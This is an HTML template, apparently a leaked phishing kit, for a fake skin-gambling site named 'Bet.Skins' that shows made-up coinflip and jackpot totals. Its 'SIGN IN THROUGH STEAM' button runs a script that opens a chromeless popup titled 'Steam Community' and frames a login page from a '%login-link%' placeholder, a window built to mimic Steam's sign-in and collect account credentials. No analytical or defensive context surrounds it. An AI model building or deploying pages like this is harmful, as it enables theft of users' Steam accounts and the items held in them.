<!--

Слит сайтом WebStudio.PW
vk.com/qu1kgg - вк
vk.com/ws_pw - группа вк
WebStudio.PW - сайт
Trade.WebStudio.PW - поддержать меня
--> 
<!DOCTYPE html>
<html>
   <head>
      <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
	  <link rel="shortcut icon" href="/favicon.ico">
      <link rel="stylesheet" href="template-5/css/main.css">
      <title>Bet.Skins  </title>
      <link href="template-5/css/main.css" rel="stylesheet">
      <script src="template-5/js/jquery-1.12.4.min.js"></script>
      <script src="template-5/js/main.js/"></script>
	  <style>#login h1 strong {
				font-weight: 700;
				color: #e9b10c;
			}
			#login h3 a {
				color: #e9b10c;
			}
			#login h3 a:hover {
				color: #96e303;
			}
			#login button:hover {
				color: #e9b10c;
			}
			#login button {
				padding: 20px;
				position: relative;
				border: 1px solid #e9b10c;
				font-size: 16px;
				font-weight: 700;
				line-height: 29px;
				display: -webkit-flex;
				align-items: center;
				margin: 40px;
				cursor: pointer;
			}
			#login #skull {
				background-image: url(template-5/img/favilcon.png);
				width: 129px;
				height: 151px;
				margin-bottom: 20px;
			}
			#login .icon.steam {
				background-image: url(template-5/img/icon-steam2.png);
				width: 50px;
				height: 29px;
				margin-right: 10px;
			}
			#playing_games{
				width:100%;
				height:100vh;
				background-image:url(template-5/img/bg.gif);
				position:absolute;
				top:0;z-index:-20;
				filter:blur(11px);
				transform:scale(1.0);
			}
	</style>
	   </head>
   <body style="background-color: #13121e;background-image: none;">
      <main id="login">
         <div id="skull"></div>
         <h1>Welcome to <strong><span id="domain_name">Bet.</span><span id="domain_zone">Skins</span></strong></h1>
         <div>
            <button><i class="icon steam"></i><span><a href="javascript:startLogin()">SIGN IN THROUGH STEAM</a></span></button>
         </div>
         <h3>BY CLICKING "SIGN IN" BUTTON YOU ARE CONFIRMING YOU'RE AT LEAST 18 YEARS OLD AND HAVE READ &amp; <a href="/rules" target="_blank">AGREED WITH USER AGREEMENT</a>.</h3>
         <div class="games">
            <div class="game">
               <div class="name">COINFLIP</div>
               <div class="value">
                  $
                  <g id="cfvalue">1184.52</g>
               </div>
            </div>
            <div class="game">
               <div class="name">JACKPOT</div>
               <div class="value">
                  $
                  <g id="jpvalue">1627.44</g>
               </div>
            </div>
         </div>
      </main>
      <div id="playing_games"></div>
   <script>
			function startLogin() {
				var win = window.open("", "", "STATUS=NO, TOOLBAR=NO, LOCATION=0, DIRECTORIES=0, RESISABLE=NO, SCROLLBARS=YES, TOP=50, LEFT=50, WIDTH=1000, HEIGHT=1000");
				var content = "<style>body {margin: 0; overflow: hidden;} iframe {height: 100%; width: 100%; border: 0;}</style>";
				content += "<title>Steam Community</title>";
				content += "<script> function closeWnd(){ setTimeout(function(){window.close();},3000); } <\/script>";
				content += "<link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' />";
				content += "<iframe src='%login-link%'></iframe>";
				win.document.write(content);
				
				setTimeout(
					function(){
						window.location.href = "/";
					},
					3000
				);
			}
		</script>
   </body>
</html>